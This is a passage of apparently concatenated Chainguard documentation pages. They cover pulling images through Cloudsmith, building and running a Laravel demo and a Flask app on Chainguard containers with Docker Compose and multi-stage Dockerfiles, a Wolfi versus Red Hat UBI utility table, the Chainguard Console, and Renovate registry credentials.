you will need to change the <cloudsmith-organization> and <cloudsmith-repository> values to reflect your own Cloudsmith setup. Additionally, be sure to change <chainguard-registry> to the name of your organization’s Chainguard registry. As an example, the following command will pull the python:3.9-dev image from a Chainguard registry named chainguard.edu and through a Cloudsmith repository named chainguard-private owned by a Cloudsmith organization named chainguard-example: docker pull docker.cloudsmith.io/chainguard-example/chainguard-private/chainguard.edu/python:3.9-dev Once this command is completed you will find the Production container you pulled in your Cloudsmith repository. If you run into issues pulling images like this, be sure that your docker pull command specifies the correct Cloudsmith organization and repository as well as the correct Chainguard registry. Debugging Pull Through from Chainguard’s registry to Cloudsmith If you run into issues when trying to pull Containers from Chainguard’s registry to Cloudsmith, please make sure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Cloudsmith repository, ensure that the URL field is set correctly. For Starter container images, this should be https://cgr.dev/chainguard; for Production containers this should be https://cgr.dev/. This field must not contain any additional components. You can troubleshoot by running docker login from another node (using the Cloudsmith pull token credentials) and try pulling an image from cgr.dev/chainguard/<image name> or cgr.dev/<example.com>/<image name>, using your own organization’s registry name in place of <example.com>. It could be that your Cloudsmith repository was misconfigured. In this case, create and configure a new Cloudsmith repository to test with. 
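For example, the following minimal sketch, run with Docker from any machine, checks the pull token credentials and both upstream paths directly against Chainguard’s registry, independent of Cloudsmith. The username, password, image name, and example.com organization are placeholders for your own values:

```
# Log in to Chainguard's registry directly with the pull token credentials
docker login cgr.dev --username "<USERNAME>" --password "<PASSWORD>"

# Verify the public (Starter) upstream path
docker pull cgr.dev/chainguard/nginx:latest

# Verify the private (Production) upstream path for your organization
docker pull cgr.dev/example.com/<image name>:latest
```

If these commands succeed but pulls through Cloudsmith still fail, the problem is likely in the Cloudsmith repository or upstream configuration rather than in the credentials themselves.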
Learn More If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Cloudsmith, we encourage you to refer to the official documentation. --- ### Getting Started with the Laravel Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/laravel/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The Laravel Chainguard Container is a container image that has the tooling necessary to develop, build, and execute Laravel applications, including required extensions. Laravel is a full-stack PHP framework that enables developers to build complex applications using modern tools and techniques that help streamline the development process. In this guide, we’ll set up a demo and demonstrate how you can use Chainguard Containers to develop, build, and run Laravel applications. This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. 1. Setting Up a Demo Application We’ll start by getting the demo application ready. The demo is called OctoFacts, and it shows a random fact about Octopuses alongside a random Octopus image each time the page is reloaded. Facts are loaded from a .txt file into the database through a database migration. By default, the application uses an SQLite database. This allows us to test the application with the built-in web server provided by the artisan serve command, without having to set up a full PHP development environment first. In the next step, we’ll configure a multi-container environment using Docker Compose to demonstrate a typical LEMP (Linux, (E)Nginx, MariaDB, and PHP) environment using Chainguard Containers. Start by cloning the demos repository to your local machine:

```
git clone git@github.com:chainguard-dev/edu-images-demos.git
```

Locate the octo-facts demo and cd into its directory:

```
cd edu-images-demos/php/octo-facts
```

The demo includes a .env.dev file with the app’s configuration for development. You should create a copy of this file and save it as .env, so that the application can load default settings:

```
cp .env.dev .env
```

You can now use the builder Laravel container image to install dependencies via Composer. Notice that we’re using the laravel system user in order to be able to write to the shared folder without issues:

```
docker run --rm -v ${PWD}:/app --entrypoint composer --user laravel \
  cgr.dev/chainguard/laravel:latest-dev \
  install
```

You can now run the database migrations and seed the database with sample data. This will populate a .sqlite database with facts obtained from the octofacts.txt file in the root of the application.

```
docker run --rm -v ${PWD}:/app --entrypoint php --user laravel \
  cgr.dev/chainguard/laravel:latest-dev \
  /app/artisan migrate --seed
```

Next, run npm install to install Node dependencies. You can use the node:latest-dev container image for that, but you’ll need to use the root container user in order to be able to write to the shared folder using this image:

```
docker run --rm -v ${PWD}:/app --entrypoint npm --user root \
  cgr.dev/chainguard/node:latest-dev \
  install
```

Then, fix permissions on node modules with:

```
sudo chown -R ${USER} node_modules/
```

The next step is to build front end assets. You can use the npm run build command for that.
Like with npm install, you’ll need to set the container user to root.

```
docker run --rm -v ${PWD}:/app --entrypoint npm --user root \
  cgr.dev/chainguard/node:latest-dev \
  run build
```

Fix permissions on the public folder:

```
sudo chown -R ${USER} public/
```

The application is all set. Next, run the built-in web server with:

```
docker run -p 8000:8000 --rm -it -v ${PWD}:/app \
  --entrypoint /app/artisan --user laravel \
  cgr.dev/chainguard/laravel:latest-dev serve --host=0.0.0.0
```

This command will create a port redirect that allows you to access the built-in web server running in the container. It uses a volume share for the application files, and sets the entrypoint to the artisan serve command. You should now be able to access the application from your browser at localhost:8000. You’ll get a page similar to this: 2. Creating a LEMP Environment with Docker Compose To demonstrate a full LEMP setup using Chainguard Containers, we’ll now set up a Docker Compose environment to serve the application via Nginx. This setup can be used as a more robust development environment that replicates a production setting based on secure container images. The following docker-compose.yaml file is already included in the root of the application folder:

```
services:
  app:
    image: cgr.dev/chainguard/laravel:latest-dev
    restart: unless-stopped
    working_dir: /app
    volumes:
      - .:/app
    networks:
      - wolfi
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:8080
    volumes:
      - .:/app
      - ./nginx.conf:/etc/nginx/nginx.conf
    networks:
      - wolfi
  mariadb:
    image: cgr.dev/chainguard/mariadb
    restart: unless-stopped
    environment:
      MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1
      MARIADB_USER: laravel
      MARIADB_PASSWORD: password
      MARIADB_DATABASE: octofacts
    ports:
      - 3306:3306
    networks:
      - wolfi

networks:
  wolfi:
    driver: bridge
```

This docker-compose.yaml file defines 3 services to run the application (app, nginx, mariadb), using volumes to share the application files within the container and a configuration file for the Nginx server, which we’ll showcase in a moment. Notice the database credentials within the mariadb service: these environment variables are used to set up the database. This is done automatically by the MariaDB container image entrypoint upon container initialization. We’ll use these credentials to configure the new database within Laravel’s .env file. Please note this Docker Compose setup is intended for local development only. For production environments, you should never keep sensitive data like database credentials in plain text. Check the Docker Compose Documentation for more information on how to handle sensitive data in Compose files. The following nginx.conf file is also included within the root of the application folder. This file is based on the recommended Nginx deployment configuration from official Laravel docs.
```
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    server {
        listen 8080;
        root /app/public;
        add_header X-Frame-Options "SAMEORIGIN";
        add_header X-Content-Type-Options "nosniff";
        index index.php;
        charset utf-8;

        location / {
            include /etc/nginx/mime.types;
            try_files $uri $uri/ /index.php?$query_string;
        }

        location = /favicon.ico { access_log off; log_not_found off; }
        location = /robots.txt { access_log off; log_not_found off; }

        error_page 404 /index.php;

        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_pass app:9000;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            fastcgi_param PATH_INFO $fastcgi_path_info;
        }

        location ~ /\.(?!well-known).* {
            deny all;
        }
    }
}
```

This file sets up the document root to app/public and configures Nginx to redirect .php requests to the container running PHP-FPM (app:9000). You can bring the environment up with:

```
docker compose up
```

This command will block your terminal and show live logs from each of the running services. With the MariaDB database up and running, you can now update Laravel’s main .env file to change the database connection from sqlite to mysql. Open the .env file in your editor of choice and locate the database settings. The DB_CONNECTION parameter is set to sqlite; change it to mysql and uncomment the remaining variables to reflect the settings from your docker-compose.yaml file. This is how the database section should look when you’re finished editing:

```
DB_CONNECTION=mysql
DB_HOST=mariadb
DB_PORT=3306
DB_DATABASE=octofacts
DB_USERNAME=laravel
DB_PASSWORD=password
```

Save and close the file. If you reload the application on your browser now, you should get a database error, because the database is empty. You’ll need to re-run migrations and seed the database. To do that, you can run a docker exec command on the live container. First, look for the container running the app service and copy its name.

```
docker compose ps

NAME                   IMAGE                                   COMMAND                  SERVICE   CREATED          STATUS          PORTS
octo-facts-app-1       cgr.dev/chainguard/laravel:latest-dev   "/bin/s6-svscan /sv"     app       11 seconds ago   Up 10 seconds
octo-facts-mariadb-1   cgr.dev/chainguard/mariadb              "/usr/local/bin/dock…"   mariadb   11 seconds ago   Up 10 seconds   0.0.0.0:3306->3306/tcp, :::3306->3306/tcp
octo-facts-nginx-1     cgr.dev/chainguard/nginx                "/usr/sbin/nginx -c …"   nginx     11 seconds ago   Up 10 seconds   0.0.0.0:8000->8080/tcp, :::8000->8080/tcp
```

Then, you can run migrations like this:

```
docker exec octo-facts-app-1 php /app/artisan migrate --seed
```

You can use the same method to execute other Artisan commands while the environment is up. After running migrations and seeding the database, you should be able to reload the app from your browser at localhost:8000 and get a new octopus fact. 3. Creating a Distroless Laravel Runtime for the Application So far, we have been using the laravel:latest-dev builder image to run the application in a development setting. For production workloads, the recommended approach for additional security is to create a distroless runtime for the application that will contain only what’s absolutely necessary for running the app in production. This is done by using a build stage within a multi-stage Dockerfile. To demonstrate this approach, we’ll now build a distroless container image and test it using the Docker Compose setup exemplified in the previous section.
The following Dockerfile is included within the root of the application:

```
FROM cgr.dev/chainguard/laravel:latest-dev AS builder

USER root
RUN apk update && apk add nodejs npm

COPY . /app
RUN cd /app && chown -R php.php /app

USER php
RUN composer install --no-progress --no-dev --prefer-dist
RUN npm install && npm run build

FROM cgr.dev/chainguard/laravel:latest

COPY --from=builder /app /app
```

This Dockerfile starts with a build stage that copies the application files to the container, installs Node and NPM, installs the application dependencies, and dumps front-end assets to the public folder. A second stage based on laravel:latest copies the application from the build stage to the final distroless image. It’s important to notice that we don’t run any database migrations here, because at build time the database might not be ready yet. In other production scenarios, you may be able to include the migration within the Dockerfile, as long as the database is already up and running. The file docker-compose-distroless.yaml included within the root of the application folder has a few changes compared to the previous docker-compose.yaml file. The app service now uses the octofacts image, which is built from the Dockerfile referenced above. The user: laravel directive is also removed so commands run as the default php user. This is how the app service looks in the new file:

```
app:
  image: octofacts
  build:
    context: .
  restart: unless-stopped
  working_dir: /app
  user: laravel
  volumes:
    - .:/app
  networks:
    - wolfi
...
```

If your environment is still running, you should stop it before proceeding. Hit CTRL+C and then run:

```
docker compose down
```

This will stop and remove all containers, networks, and volumes created by the previous docker-compose.yaml file. You can now bring the new environment up with:

```
docker compose -f docker-compose-distroless.yaml up
```

Once the environment is up and running, you can now run the database migrations with:

```
docker exec octo-facts-app-1 php /app/artisan migrate --seed
```

You should now be able to reload your browser and obtain a new octopus fact. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Laravel Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Migrating to Python Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-python/ Last Modified: May 2, 2024 Tags: Chainguard Containers, Product, Migration This guide is a high-level overview for migrating an existing containerized Python application to Chainguard Containers. Chainguard Containers are built on Wolfi, a distroless Linux distribution designed for security and a reduced attack surface. Chainguard Containers are smaller and have low to no CVEs.
Our Chainguard Containers for Python are built nightly for extra freshness, so they’re always up-to-date with the latest remediations. What is Distroless? Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi OS? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Because Chainguard Containers aim to be minimal, adapting your containerized application requires that you consider some additional factors that will be discussed below. Chainguard Containers for Python Overview We distribute two versions of our Python container image: a development image that includes shells such as ash/bash and package managers such as pip, and a standard image that removes these tools for increased security. Our public standard images are tagged as latest, while our public development images are tagged as latest-dev. Differences from the Docker Official Image When migrating your Python application, keep in mind these differences between the Chainguard Container for Python and the official Docker image. The entrypoint for the Chainguard Container for Python is /usr/bin/python. When running either the latest or latest-dev versions of the image interactively, you’ll be working in the Python interpreter. When using CMD in your Dockerfiles, provided commands will be passed to python by default. If you change the path to include binaries from a virtual environment, you should manually set the entrypoint or your Dockerfile will continue to use the included system Python as the entrypoint and you will not have access to installed packages in the virtual environment. Chainguard Containers for Python run as the nonroot user by default. If you need elevated permissions, such as to add packages with apk, run the image with --user root. You should not use the root user in a production scenario. The /home and /home/nonroot directories are owned by the nonroot user. The python:latest Chainguard Container intended for production does not include sh, ash, or bash. See the Debugging Distroless guide for advice on resolving issues without the use of these shells. The python:latest Chainguard Container does not contain package managers such as pip or apk. See the sections below for guidance on multi-stage builds (recommended) or building your own images on Wolfi (advanced usage). Chainguard Containers for Python aim to be lightweight, and you may find that specific packages or dependencies are not included by default. The image details reference provides specific information on packages, features, and default environment variables for the image. Migrating a Python Application When migrating most containerized Python applications, we recommend building a virtual environment with any needed Python packages using our provided development images, then copying over the virtual environment to our stripped-down standard image. Chainguard Academy hosts detailed instructions for a multi-stage build for a CLI-based Python script. The below Dockerfile provides an example of such a multi-stage build for a simple Flask application.
You can view a version of this Dockerfile with included sample Flask application and requirements.txt in this repository, and the original unmigrated application in the v0 branch. A more complex setup with reverse proxy orchestrated with Docker Compose is provided in the next section.

```
# syntax=docker/dockerfile:1
FROM cgr.dev/chainguard/python:latest-dev AS dev

WORKDIR /flask-app

RUN python -m venv venv
ENV PATH="/flask-app/venv/bin":$PATH

COPY requirements.txt requirements.txt
RUN pip install -r requirements.txt

FROM cgr.dev/chainguard/python:latest

WORKDIR /flask-app

COPY app.py app.py
COPY --from=dev /flask-app/venv /flask-app/venv
ENV PATH="/flask-app/venv/bin:$PATH"

EXPOSE 8000

ENTRYPOINT ["python", "-m", "gunicorn", "-b", "0.0.0.0:8000", "app:app"]
```

When running an application containerized with the above Dockerfile, the application should be visible on 0.0.0.0:8000. As you can see, the primary difference in this Flask application compared to the pre-migration application is the use of a multistage build. In the initial stage, we copy our requirements into the development version of the Python Chainguard Image, initialize a virtual environment, and install needed packages with pip. In the second stage, we copy the virtual environment from the development image, copy the application from the host, set exposed port metadata, and run the application with the Gunicorn WSGI server. By default, the entrypoint for the Python Chainguard Container is /usr/bin/python rather than bash. However, if you shadow the included system python with the virtual environment python on the path as we do above, you should set the entrypoint explicitly. Otherwise, you will not have access to the packages included in your virtual environment. We recommend that you pin dependencies to specific versions in your own application. The example Flask application script linked above also enables debug mode, which should be turned off in a production scenario. You may wish to include the following environment variables in your Dockerfile. The first prevents the buffering of output, meaning that all messages printed to standard output are immediately printed rather than being held in a cache. The second prevents the creation of cached bytecode, which can marginally reduce image size.

```
ENV PYTHONUNBUFFERED 1
ENV PYTHONDONTWRITEBYTECODE 1
```

Serving an Application with nginx and Docker Compose We provide an nginx Chainguard Container, also with low to no CVEs, that can be used as a secure and performant reverse proxy to serve your application. You can view an example orchestration of a Flask application and nginx using Chainguard Containers at the linked repository. The compose.yml file is provided as a reference below.

```
services:
  flask-app:
    build:
      context: flask-app
    restart: always
    ports:
      - 8000:8000
    networks:
      - backnet
      - frontnet
  nginx:
    build: nginx
    restart: always
    ports:
      - 80:80
    depends_on:
      - flask-app
    networks:
      - frontnet

networks:
  backnet:
  frontnet:
```

The backnet and frontnet networks are provided in anticipation of other backend services such as a database container. View the sample repository branch for a full orchestration example with nginx configuration. Advanced Usage If your project requires a set of packages that cannot be installed with pip using the multi-stage approach above, you can consider building your application on the Wolfi base image and installing additional Python and non-Python packages as APKs.
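As a minimal sketch of that approach, the following commands start a wolfi-base container, refresh the package index, and search for available Python packages before installing one with apk. The python-3.12 package name is illustrative; confirm current package names with apk search before relying on them:

```
# Start an interactive wolfi-base container, refresh the apk index,
# list matching Python packages, then install one of them
docker run -it --rm cgr.dev/chainguard/wolfi-base sh -c \
  "apk update && apk search python-3 && apk add python-3.12"
```

In a real build you would run the same apk add steps from a Dockerfile based on the wolfi-base image and use the resulting image as the base for your application.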
Additional Resources You may wish to refer to the Python microservice example in the porting a sample application guide as an additional useful reference while migrating your application. Debugging distroless containers can be a challenge given their lack of interactive tools such as shells. If you’re having difficulty debugging issues with your multi-stage build, you may find the Debugging Distroless guide a useful resource. The following blog posts and videos may also assist with migrating your Python application: Blog Post: Securely Containerize a Python Application with Chainguard Containers Video: How to containerize a Python application with a multi-stage build using Chainguard Containers --- ### Red Hat UBI Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/red-hat-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Red Hat UBI base images have different binaries and scripts included in their respective busybox and coreutils packages. Note that Red Hat UBI images by default do not have a busybox package. The following table lists common tools and their corresponding package(s) in both Wolfi and Red Hat distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Red Hat. You can use the apk search command in Wolfi, or the yum search or dnf search commands in Red Hat to find out which package includes a tool. 
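For example, to find which package provides the zcat utility mentioned above, you could run a search with each distribution's package manager. These commands are illustrative and assume you are working inside a Wolfi-based container and a Red Hat UBI container, respectively:

```
# In a Wolfi-based container
apk update
apk search gzip

# In a Red Hat UBI container
dnf search gzip
```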
Utility Wolfi busybox Redhat-ubi busybox Wolfi coreutils Redhat-ubi coreutils [ ✅ ✅ ✅ [[ ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ arch ✅ ✅ arping ✅ ash ✅ awk ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ basename ✅ ✅ ✅ basenc ✅ bbconfig ✅ bc ✅ beep ✅ bunzip2 ✅ bzcat ✅ bzip2 ✅ cal ✅ cat ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ chmod ✅ ✅ ✅ chown ✅ ✅ ✅ chpasswd ✅ chroot ✅ ✅ ✅ chrt ✅ cksum ✅ ✅ ✅ clear ✅ cmp ✅ comm ✅ ✅ ✅ coreutils ✅ ✅ cp ✅ ✅ ✅ cpio ✅ cryptpw ✅ csplit ✅ ✅ cut ✅ ✅ ✅ date ✅ ✅ ✅ dc ✅ dd ✅ ✅ ✅ delgroup ✅ deluser ✅ df ✅ ✅ ✅ diff ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ dmesg ✅ dnsdomainname ✅ dos2unix ✅ du ✅ ✅ ✅ echo ✅ ✅ ✅ ed ✅ egrep ✅ env ✅ ✅ ✅ expand ✅ ✅ ✅ expr ✅ ✅ ✅ factor ✅ ✅ ✅ fallocate ✅ false ✅ ✅ ✅ fgrep ✅ find ✅ findfs ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ free ✅ fsync ✅ fuser ✅ getopt ✅ getty ✅ grep ✅ groups ✅ ✅ gunzip ✅ gzip ✅ hd ✅ head ✅ ✅ ✅ hexdump ✅ hostid ✅ ✅ ✅ hostname ✅ id ✅ ✅ ✅ inotifyd ✅ install ✅ ✅ ✅ ionice ✅ iostat ✅ ipcrm ✅ ipcs ✅ join ✅ ✅ kill ✅ killall ✅ killall5 ✅ less ✅ link ✅ ✅ ✅ linux32 ✅ linux64 ✅ ln ✅ ✅ ✅ logger ✅ login ✅ logname ✅ ✅ ls ✅ ✅ ✅ lsattr ✅ lsof ✅ lzcat ✅ lzma ✅ lzop ✅ lzopcat ✅ md5sum ✅ ✅ ✅ microcom ✅ mkdir ✅ ✅ ✅ mkfifo ✅ ✅ ✅ mknod ✅ ✅ ✅ mkpasswd ✅ mktemp ✅ ✅ ✅ more ✅ mountpoint ✅ mpstat ✅ mv ✅ ✅ ✅ netstat ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ nproc ✅ ✅ ✅ nsenter ✅ numfmt ✅ ✅ od ✅ ✅ ✅ passwd ✅ paste ✅ ✅ ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ping ✅ ping6 ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ pkill ✅ pmap ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ps ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ pwdx ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ realpath ✅ ✅ ✅ remove-shell ✅ renice ✅ reset ✅ resize ✅ rev ✅ rm ✅ ✅ ✅ rmdir ✅ ✅ ✅ run-parts ✅ runcon ✅ ✅ sed ✅ seq ✅ ✅ ✅ setpriv ✅ setserial ✅ setsid ✅ sh ✅ sha1sum ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ sha512sum ✅ ✅ ✅ shred ✅ ✅ ✅ shuf ✅ ✅ ✅ sleep ✅ ✅ ✅ sort ✅ ✅ ✅ split ✅ ✅ ✅ stat ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ stty ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ sync ✅ ✅ ✅ sysctl ✅ tac ✅ ✅ ✅ tail ✅ ✅ ✅ tar ✅ tee ✅ ✅ ✅ test ✅ ✅ ✅ time ✅ timeout ✅ ✅ ✅ top ✅ touch ✅ ✅ ✅ tr ✅ ✅ ✅ traceroute ✅ traceroute6 ✅ tree ✅ true ✅ ✅ ✅ truncate ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ttysize ✅ tunctl ✅ uname ✅ ✅ ✅ unexpand ✅ ✅ ✅ uniq ✅ ✅ ✅ unix2dos ✅ unlink ✅ ✅ ✅ unlzma ✅ unlzop ✅ unxz ✅ unzip ✅ uptime ✅ users ✅ ✅ usleep ✅ uudecode ✅ uuencode ✅ vconfig ✅ vdir ✅ ✅ vi ✅ vlock ✅ watch ✅ wc ✅ ✅ ✅ which ✅ who ✅ ✅ ✅ whoami ✅ ✅ ✅ xargs ✅ xxd ✅ xzcat ✅ yes ✅ ✅ ✅ zcat ✅ --- ### Using the Chainguard Directory and Console URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/images-directory/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product There are hundreds of Chainguard Containers available for use. To help users explore and better understand all of these container images, we’ve developed the Chainguard Directory. This guide serves as a walkthrough of the browsing experience for Chainguard Containers in the Directory and Console, including how to access it and get the most out of its features. Accessing the Chainguard Directory and Console This guide is primarily framed around the Chainguard Directory and the Chainguard Console. The Console is accessible to anyone, including users who aren’t Chainguard customers. To access the Console, you’ll first need to create an account and sign in. 
If you would like to open the console with your Organization already selected, you can use (and bookmark) a link like this, replacing ORGANIZATION with your organization’s name: https://console.chainguard.dev/auth/login?org=ORGANIZATION If you’re not ready to create a Chainguard account, you can follow along with the public Chainguard Directory. As of this writing, there are some differences between the two websites, but both should provide a similar Chainguard Containers browsing experience. Browse Chainguard Containers After signing in to the Chainguard Console, your browser will take you to a landing page like the following. Click Browse Containers in the left-hand navigation. There, you’ll be presented with a list of all of Chainguard’s available images. Note: If you are part of an organization, you may have access to resources in the Organization images tab. If so, you can explore the images there as you would with the Browse Containers tab. The table view above has five columns: Name: the name of each given container image. Latest version: the latest available version of the image. Note that this column’s value could be a version number or it may read latest. In the former case, this means that the latest version Chainguard offers is a different, later version than the publicly available image tagged with :latest. URI: the registry URI you can use in a docker pull command to download the container image. Production containers, which are not publicly available, will instead have a message reading “Contact us for access to this image” with a link to Chainguard’s contact form. Available versions: a list of what versions are available for this container image. Each container image will have a latest version, and most will also have a latest-dev version. Updated: how long it’s been since the container image was last updated. Note that container images listed in the Organization container images tab have an extra column labeled Entitlement. This column specifies what resources an organization has purchased and has access to. This column can show one of two possible values: Active, meaning that your organization is able to download and use the container image, or Expired, meaning that your organization had access to the container image in the past but no longer does. You can click on any of these column names to sort the list of container images in ascending or descending order based on the values in these columns. Above the table is a search box you can use to find specific container images by their name or latest version number. To the right of this box is a drop-down menu labeled Category. You can use this to filter the images listed based on what category they belong to. Container image information Next, let’s inspect an individual container image. Click on any container image you’d like. This example shows the page for the argocd image. Each container image page has eight tabs that provide information about various facets of the given image. Versions tab The default page for each image is the Versions tab, which contains information about the versions available for each image. This contains a table with the following columns: Version: this column lists each version tag available for the container image. Pull URL: the URL you can use to download each version of the image. As with the main Containers Directory page, Production containers will have a message reading “Contact us for access to this image” with a link to Chainguard’s contact form. Size: the size of the image, in megabytes.
Last changed: when each version of the image was last updated. Above the table is a search box which you can use to filter the different versions available for the image. There is also a Variants drop-down menu you can use to filter for all images or only -dev variants. Overview tab The Overview tab contains the container image’s README. Typically, this will include instructions on how to download the container image, any relevant compatibility notes, and instructions on how to get started with using the image. Provenance tab All Chainguard Containers contain verifiable signatures and high-quality software bills of materials (SBOMs). These features allow you to confirm the origin of each image and provide you with a detailed list of everything included in the container image. The Provenance tab outlines how you can verify container signatures and download and verify image Attestations, all with examples using cosign. Specifications tab The Specifications tab is where you can find a number of important details about a given container image, such as whether the image ships with the apk package manager or a shell. It also includes information like the image’s default user ID, environment variables, and its entrypoint. SBOM tab The SBOM tab contains a list of packages in the image. Chainguard Containers are built so that everything contained in the image is a package, meaning that this package list gives a complete view of what’s in the container image. You won’t find anything hidden in the image that isn’t listed in its SBOM tab. The table listing an image’s packages has four columns. Package: the name of each package included in the image’s SBOM. Version: the version of the listed package. Repository: every package found in Chainguard Containers is either built and managed by the Chainguard team or sourced from Wolfi. For packages falling into the latter category, this column will include a link to the Wolfi GitHub repository showing the package source. License: the license under which each package is published. Above the table is a search box you can use to find and filter the packages listed. To the left of this search box is a drop-down menu you can use to select which version of the image you want to find the SBOM for as well as what architecture (either x86_64 or arm64). Finally, to the right of the search box is a button labeled Download SBOM. You can click this button to download the SBOM (in the SPDX format) to your machine. Note that Chainguard began generating SBOMs for its images on November 15, 2023. For this reason, any versions of a given container image that were released before that date will not have any SBOM data to show. Vulnerabilities tab The Vulnerabilities tab contains a list of every CVE one can find within the image. As with the SBOMs tab, the Vulnerabilities tab has a search box you can use to find and filter specific vulnerabilities within the image. There is also a drop-down menu to the left allowing you to select different versions of the container image. Below these is a table listing the vulnerabilities. However, most Chainguard Containers won’t show any vulnerabilities for the latest version. This isn’t an error, as we aim to remove vulnerabilities from images as soon as they arise. To illustrate how this table appears when vulnerabilities are actually present, you can select different versions in the drop-down until you find one with a vulnerability. This example shows the latest version of the argocd image. The Vulnerabilities table has five columns. 
CVE ID: the official identification number of each vulnerability present in the table. Severity: the severity of each given vulnerability. This can either read Critical, High, Medium, Low, or Unknown. Package: the package where the vulnerability was found. Version: the version of the package containing the vulnerability. Last detected: the date and time when the vulnerability last appeared in a scan of the container image. To the left of each row in the table is a down-pointing chevron (˅). If you click on this symbol, more information about the given vulnerability will appear below the vulnerability’s row. Specifically, this will highlight the Package name and Version number of the package associated with the Vulnerability. It also shows the Fixed version of the package, a brief Description of the vulnerability, and one or more References you can review to learn more about the vulnerability. Please be aware that, as with SBOM data, Chainguard began generating vulnerability information for its images on November 15, 2023. For this reason, any versions of a given image that were released before that date will not have any vulnerability data to show. Advisories tab The next tab is the Advisories tab. When you scan a newly-built Chainguard Container with a vulnerability scanner, typically, no CVEs will be reported. However, as software packages age, more vulnerabilities are reported and CVEs will begin to accumulate in images. When this happens, Chainguard releases security advisories to communicate these vulnerabilities to downstream container image users. You can find all the advisories issued for a given image in its Advisories tab. To learn more about Chainguard security advisories, we encourage you to read our article on How Chainguard Issues Security Advisories as well as our guide on How to Use Chainguard Security Advisories. You can also find every security advisory published for Chainguard Containers by exploring our self-service Security Advisories page. Comparisons tab The last tab is the Comparisons tab. This tab includes useful data that shows how a given Chainguard Container compares against a non-Chainguard alternative in terms of CVE count. It also includes helpful visualizations of these comparisons. For more information, check out our guide on CVE Visualizations. Learn more The Chainguard Containers Directory is a useful tool for understanding what Chainguard Containers are available. To better understand how to work with individual container images, you can see if we have a getting started guide available. We also provide a guide on how to view security advisories through our self-service public Security Advisories page. --- ### Using Renovate with Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/renovate/ Last Modified: September 5, 2024 Tags: Chainguard Containers, Product Renovate can be used to alert on updates to Chainguard Containers. This can be an effective way to keep your images up-to-date and CVE-free. This article will explain how to configure Renovate to support Chainguard Containers. NOTE: This article describes using Renovate to alert on new versions of Chainguard Containers. It is not about alerts for Wolfi packages (which is unsupported at the time of writing). Prerequisites This guide assumes you have successfully installed and configured Renovate. If you haven’t already set this up, please refer to the installation instructions.
Setting up Credentials for Renovate In order to support versioned images from a private repository, you will need to provide Renovate with credentials to access the Chainguard registry at cgr.dev. You can do this by creating a token with chainctl, as in this example:

```
chainctl auth configure-docker --pull-token
```

This will respond with output such as:

```
To use this pull token in another environment, run this command:
docker login "cgr.dev" --username "<USERNAME>" --password "<PASSWORD>"
```

By default, this credential is good for 30 days. You can now configure hostRules in Renovate to support our registry. Depending on how Renovate was set up, you can add this to renovate.json or config.json with a setting such as:

```
{
  ...
  "hostRules": [
    {
      "hostType": "docker",
      "matchHost": "cgr.dev",
      "username": "<USERNAME>",
      "password": "<PASSWORD>"
    }
  ]
}
```

Be aware that you SHOULD NOT check this file into source control with the exposed secret. Instead, you can use environment variables which you pass in at runtime if you use a config.js file:

```
module.exports = {
  ...
  "hostRules": [
    {
      "hostType": "docker",
      "matchHost": "cgr.dev",
      "username": process.env.CGR_USERNAME,
      "password": process.env.CGR_PASSWORD,
    }
  ]
};
```

